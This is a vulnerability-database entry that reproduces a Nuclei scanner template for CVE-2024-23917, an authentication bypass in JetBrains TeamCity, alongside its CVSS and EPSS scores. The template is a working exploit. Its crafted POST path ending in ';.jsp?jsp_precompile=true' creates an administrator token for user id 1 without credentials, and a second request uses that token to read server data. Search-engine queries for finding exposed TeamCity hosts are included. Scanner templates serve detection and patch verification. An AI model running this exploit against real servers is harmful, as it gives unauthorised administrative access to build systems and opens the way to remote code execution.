Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-23917
HistoryApr 30, 2024 - 12:52 p.m.

JetBrains TeamCity > 2023.11.3 - Authentication Bypass

2024-04-3012:52:48
ProjectDiscovery
github.com
22
jetbrains teamcity
authentication bypass
remote code execution
cve-2024-23917

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.044 Low

EPSS

Percentile

92.4%

In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible
id: CVE-2024-23917

info:
  name: JetBrains TeamCity > 2023.11.3 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible
  reference:
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://www.rapid7.com/db/vulnerabilities/jetbrains-teamcity-cve-2024-23917/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-23917
    cwe-id: CWE-306,CWE-288
    epss-score: 0.04384
    epss-percentile: 0.92363
    cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: jetbrains
    product: teamcity
    shodan-query:
      - "http.title:teamcity"
      - http.component:"teamcity"
    fofa-query: "title=teamcity"
    google-query: "intitle:teamcity"
  tags: cve,cve2024,auth-bypass,teamcity,jetbrains
flow: http(1) && http(2)

http:
  - method: POST
    path:
      - "{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"
    headers:
      Content-Type: "application/x-www-form-urlencoded"

    matchers:
      - type: dsl
        dsl:
          - status_code==200
          - "contains(content_type,'application/xml')"
          - 'contains(body,"<token name=\"{{randstr}}\"")'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: authtoken
        internal: true
        group: 1
        regex:
          - 'value="(.+)"'

  - method: GET
    path:
      - "{{BaseURL}}/app/rest/server"
    headers:
      Authorization: "Bearer {{authtoken}}"

    extractors:
      - type: dsl
        dsl:
          - '"Token:" + authtoken'

    matchers:
      - type: dsl
        dsl:
          - "status_code==200"
          - "contains(content_type,'application/xml')"
          - "contains(body,'<projects href=')"
        condition: and
# digest: 4a0a004730450220148e3d60d45a7598faca5ac1e4372beb469bb5270575a9ba24836b84e7efeb21022100ddaf2714ec4ab4c387e2b72f8cbf8380913ae7440af993a425a2347acb1f0b7e:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.044 Low

EPSS

Percentile

92.4%